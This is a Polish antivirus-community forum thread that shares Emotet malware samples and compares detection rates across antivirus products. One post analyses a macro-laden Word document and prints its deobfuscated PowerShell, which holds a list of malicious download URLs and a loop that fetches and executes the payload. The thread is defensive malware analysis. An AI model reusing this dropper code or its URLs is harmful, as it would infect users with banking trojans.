16.09.2019, 20:33
Treść widoczna jedynie dla zarejestrowanych użytkowników
Z życia wzięte. Comodo i MBAM nic.
Ostrzeżenia Firefoksa zauważyły szkodnika przy pobieraniu.
Człowiek, któremu zazdroszczą najlepszych pomysłów na sygnatury...
Paczki, malware, złośliwe pliki, linki itp.
|
16.09.2019, 20:33
Treść widoczna jedynie dla zarejestrowanych użytkowników Z życia wzięte. Comodo i MBAM nic. Ostrzeżenia Firefoksa zauważyły szkodnika przy pobieraniu.
Człowiek, któremu zazdroszczą najlepszych pomysłów na sygnatury...
16.09.2019, 21:18
(16.09.2019, 20:33)M\cin napisał(a): Eset wykrywa
16.09.2019, 21:30
(15.09.2019, 21:22)Wiktorus napisał(a): KIS wykrywa
MD + WHHL
17.09.2019, 09:43
avast i mks alarmują
(16.09.2019, 20:33)Mcin napisał(a): Zaciemniony skrypt powershell. Pobiera i ładuje trojana Emotet. Comodo przy wykonaniu pliku wykonywalnego powinien ten rodzaj VirusScopem wykryć.
18.09.2019, 20:03
Mogę dodać że Emotet dodatkowo ładuje trojana bankowego Trickbot
Treść widoczna jedynie dla zarejestrowanych użytkowników
18.09.2019, 20:24
Mks_vir i eset alarmuja
18.09.2019, 21:58
@tachion Czym analizowałeś? Ja tylko na szybko próbowałem "manualnie" prześledzić VBA i przegrałem. Otwierałem plik w Comodo Sandbox, więc możliwe, ze kod dodatkowo "zaciemnił się" jak wykrył odpalenie w piaskownicy.
Człowiek, któremu zazdroszczą najlepszych pomysłów na sygnatury...
19.09.2019, 13:08
30 Malware
Hasło: infected Treść widoczna jedynie dla zarejestrowanych użytkowników
19.09.2019, 14:41
Windows Defender podczas skanowania pozostawił 8 plików
Post sprawdzony przez MKS_VIR
19.09.2019, 15:18
Immunet 12/30 40%
Eset 14/30
Przepuścił ,,copia fattura.dox.exe - pinfile , reszte dokument programu microsoft office + rtf do 20:43 symantec ===== +--+-+-++-+-++--+++-++++++++-+ fortinet ===== ++-+--+++---+-+--++-+-+-+--+-+ mcafee ======= +-+++++++-++++--++++++++++++-+ trendMicro === ++-++++++-++++--+++--++---++++ Qihoo-360 ==== ++-++++++-++++--++-+-++-++++++ Arcabit ====== --+++++++-++++--+--++++-+-++-- kaspersky ==== -+-+--+-++-+-----++++-+----+++ + wykryty - nie wykryty Lepszy mcafee według sygnatur
20.09.2019, 17:43
20 Malware
Treść widoczna jedynie dla zarejestrowanych użytkowników
20.09.2019, 17:51
Immunet 8/20 40%
20.09.2019, 19:55
20:54
Symanyec ====01100010011000001010 fortinet ======00110110011001011101 Qihoo-360 ====01110111111011011000 Arcabit ======00111100011011000001 Kaspersky ====00111111111001011111 (18.09.2019, 21:58)Mcin napisał(a): Sam kod makra jest zaciemniony. Widać po funkcji AutoOpen - czyli działa kiedy program jest uruchomiony. Kod: Function lFZOPK() Kod: Function Jvf6up() Potem następuje wywołanie powershell w celu uruchomienia zaciemnionego skryptu, który jest zaciemniony w base64, a samych takich warstw zaciemnienia może być ponad 30 nawet. Kod: PROCESS: powershell.exe [2000] Po odkodowaniu widoczne są złośliwe adresy z których zostaje pobrane złośliwe oprogramowanie. Kod: https://stackspay.com/wp-includes/0sxfg82114/@https://www.reza-khosravi.com/wp-content/q2/@http://w3brasil.com/sistema/p5q207/@https://www.pronhubhd.com/cgi-bin/m0cux6/@https://www.karenshealthfoods.com/wp-includes/95oos267/'."s`PLIt"('@');$FCoRz8lI='U8LdDj';foreach($NOBXzi in $XOJOsjW){try{$jjRBwGJH."do`WnloAdF`i`lE"($NOBXzi, $vnqpGqn);$f3rXzpb7='Q239rltn';If ((&('Get'+'-Item') $vnqpGqn)."lEn`GtH" -ge 20485) {[Diagnostics.Process]::"sT`ARt"($vnqpGqn);$Q5u0tj='iOzisLAA';break;$w24h4z='WQkubi'}}catch{}}$O98YDGEI='bSKzqk_' np. jeden z nich: [Aby zobaczyć linki, zarejestruj się tutaj] Reszta na priv |
« Starszy wątek | Nowszy wątek »
|